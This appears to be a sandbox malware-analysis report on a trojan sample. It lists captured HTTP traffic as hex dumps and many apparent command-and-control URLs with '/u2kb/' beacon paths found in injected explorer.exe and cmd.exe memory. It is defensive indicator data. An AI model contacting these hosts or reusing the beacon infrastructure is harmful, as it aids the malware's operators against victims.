0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.0.28expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://thedivinerudraksha.com/wp-json/>; rel="https://api.w.org/"content-length: 11417content-encoding: gzipvary: Accept-Encodingdate: Mon, 20 Mar 2023 16:00:49 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7b 73 e3 36 b2 ef df 33 55 f9 0e 58 e6 cc da da 88 14 a9 87 1f b2 ad 3d 99 64 b6 4e ce 49 36 53 99 c9 d9 da 9b 4d a9 20 12 92 38 26 09 2e 49 49 76 1c ef f7 b9 5f e3 7e b2 5b 0d 80 24 48 82 0f d9 f2 ec 64 d7 9e 1a 5b 02 1a 8d 46 a3 f1 03 d0 78 5d fe ee eb ef bf 7a ff d7 b7 6f d0 7f bd ff ee db d9 67 2f 2f d7 89 ef 21 0f 07 ab 2b 8d 04 fa 8f ef 34 16 48 b0 33 fb ec e5 8b 4b 9f 24 18 d9 6b 1c c5 24 b9 d2 7e 7c ff 27 fd 4c 63 11 89 9b 78 64 f6 16 af 08 0a 68 82 96 74 13 38 e8 f7 9f 9f 0d 2d eb 02 bd 5f 13 f4 b5 bb 75 03 82 7e d8 38 11 be 8e d7 f8 72 c0 93 bc e4 3c 03 ec 93 ab a3 88 2e 68 12 1f 21 9b 06 09 09 92 ab 23 1f df e8 ae 8f 57 44 0f 23 b2 75 c9 6e ea e1 68 45 8e d0 60 f6 f2 d2 73 83 6b 14 11 ef ea c8 09 62 20 58 92 c4 5e 1f a1 75 44 96 57 47 83 41 b2 26 0e cb 35 4a 33 35 6c ea 77 4b bb a4 41 12 1b 2b 4a 57 1e c1 a1 1b 2b 52 6a d8 4b 48 14 e0 84 68 28 b9 0d c9 95 86 c3 d0 73 6d 9c b8 34 18 44 71 fc c5 8d ef 69 88 15 f3 4a 53 e9 00 fd 3e c2 7f df d0 0b f4 27 42 1c 8d e7 ad ad 93 24 8c a7 75 d2 0f 96 84 38 03 ed c9 24 f9 8a fa 3e 09 92 78 1f 91 6c 91 46 96 2d af 54 0d aa 2d a4 51 a2 65 d5 aa ed 5c 27 59 5f 39 64 eb da 44 67 5f fa c8 0d dc c4 c5 9e 1e db d8 23 57 96 56 64 f2 ee 7f fe fa f6 cd fc fd f7 df 7f fb fa cb 1f 24 4e 85 f0 f9 db 2f 7f 78 f7 e6 87 f9 57 df 7f f7 f6 cb f7 df bc fe f6 4d 89 4b b2 26 3e d1 6d ea d1 48 e2 f1 f9 92 8c 4f c6 79 8e 61 44 43 12 25 b7 57 1a 5d 4d 99 d2 24 e2 3d 4c 5c cd 70 13 79 12 3b 50 6d bd 66 37 c3 eb c5 40 cd c6 a3 a0 27 89 13 09 e6 d0 5a 55 b4 b1 9b 90 39 68 40 22 ef 2e 30 58 94 5c 77 64 01 fc 80 36 4e 6e 3d 82 5c e7 ea 68 47 29 b3 82 c8 26 ba 1b 78 6e 90 fd b1 e3 f8 68 f6 d2 90 08 d0 92 46 3e 32 e0 b7 1e d1 1d 32 22 f2 f7 8d 1b 11 07 dd a1 ad 1b bb 0b d7 73 93 db 29 ff ec 91 0b 74 ff f2 72 c0 b2 2a b4 5b 16 12 af 09 49 8e 98 08 9b 58 67 8d 96 e5 28 da 71 6a b8 aa d6 3c b0 e3 f8 8f 4b ec bb de ed d5 1b ef 8b ef 48 1c bb 91 fb 6a f4 e5 d8 34 5f 9d 7e f5 63 b4 c0 81 1b 27 22 60 f8 d5 84 fd 3e 31 cd df 7f 6e 8e ce 2e 1c 37 0e 3d 7c 7b 15 ef 70 c8 43 b6 24 ba 3a 31 2c c3 3a 42 3e 71 5c 7c 75 84 3d af 8c 36 0a a9 59 50 59 ea 7a 9b d8 85 ba a8 8b 01 33 e7 78 f0 8d 1f 46 e4 17 0c 05 e2 7a 32 7c 37 30 a0 78 20 d2 99 61 8d f7 94 48 ae cd 43 c8 45 7d 9f 06 4c bc Data Ascii: }{s63UX=dNI6SM 8&.IIv_~[$Hd[Fx]zog//!+4H3K$k$~|'Lcxdht8-_
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:01:02 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sun, 19 Jun 2022 19:42:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 462Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00 Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:01:07 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sun, 19 Jun 2022 19:42:34 GMTAccept-Ranges: bytesContent-Length: 746Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 36 65 6d 3b 20 7d 20 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 47 65 6f 72 67 69 61 2c 20 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 34 61 34 61 34 61 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 0a 20 20 20 20 53 6f 72 72 79 2c 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 65 20 55 52 4c 20 6f 72 20 67 6f 20 62 61 63 6b 20 61 20 70 61 67 65 2e 0a 20 20 3c 2f 68 31 3e 0a 20 20 0a 20 20 3c 68 32 20 73 74 79 6c 65 3d 22 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 37 64 37 64 37 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 22 3e 0a 20 20 20 20 34 30 34 20 45 72 72 6f 72 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 0a 20 20 3c 2f 68 32 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; marg
Source: cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://fonts.googleapis.com/css?family=Open
Source: explorer.exe, 00000004.00000002.580448726.00000000150CC000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.00000000042BC000.00000004.10000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://img.sedoparking.com
Source: explorer.exe, 00000004.00000002.580448726.0000000015714000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://justinmezzell.com
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000002.580448726.00000000158A6000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004A96000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7l
Source: explorer.exe, 00000004.00000002.580448726.0000000014C16000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000003E06000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.222ambking.org
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.222ambking.org/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.222ambking.org/u2kb/www.222ambking.org
Source: explorer.exe, 00000004.00000000.327263504.0000000008260000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.avisrezervee.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.avisrezervee.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.avisrezervee.com/u2kb/www.avisrezervee.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bitservicesltd.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bitservicesltd.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bitservicesltd.com/u2kb/www.bitservicesltd.com
Source: explorer.exe, 00000004.00000002.580448726.0000000015714000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.dzyngiri.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ecomofietsen.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ecomofietsen.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ecomofietsen.com/u2kb/www.ecomofietsen.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.employerseervices.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.employerseervices.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.employerseervices.com/u2kb/www.employerseervices.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.energyservicestation.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.energyservicestation.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.energyservicestation.com/u2kb/www.energyservicestation.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.fclaimrewardccpointq.shop
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.fclaimrewardccpointq.shop/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shop
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.germanreps.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.germanreps.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.germanreps.com/u2kb/www.germanreps.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.gritslab.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.gritslab.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.gritslab.com/u2kb/www.gritslab.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mygloballojistik.online
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mygloballojistik.online/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mygloballojistik.online/u2kb/www.mygloballojistik.online
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.shapshit.xyz
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.shapshit.xyz/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.shapshit.xyz/u2kb/www.shapshit.xyz
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thedivinerudraksha.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thedivinerudraksha.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thewildphotographer.co.uk
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thewildphotographer.co.uk/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.un-object.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.576758060.000000000C94E000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.un-object.com/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.un-object.com/u2kb/www.un-object.com
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.white-hat.uk
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.white-hat.uk/u2kb/
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.white-hat.uk/u2kb/www.white-hat.uk
Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.younrock.com
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.younrock.com/u2kb/
Source: cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.younrock.com/u2kb/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4c
Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.younrock.com/u2kb/www.younrock.com
Source: HI4NJ046K.5.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://alldomains.hosting/
Source: explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://alldomains.hosting/domain-registrieren.html
Source: explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://alldomains.hosting/e-mail-server.html
Source: cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://alldomains.hosting/hosting-webhosting.html
Source: HI4NJ046K.5.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: HI4NJ046K.5.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HI4NJ046K.5.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
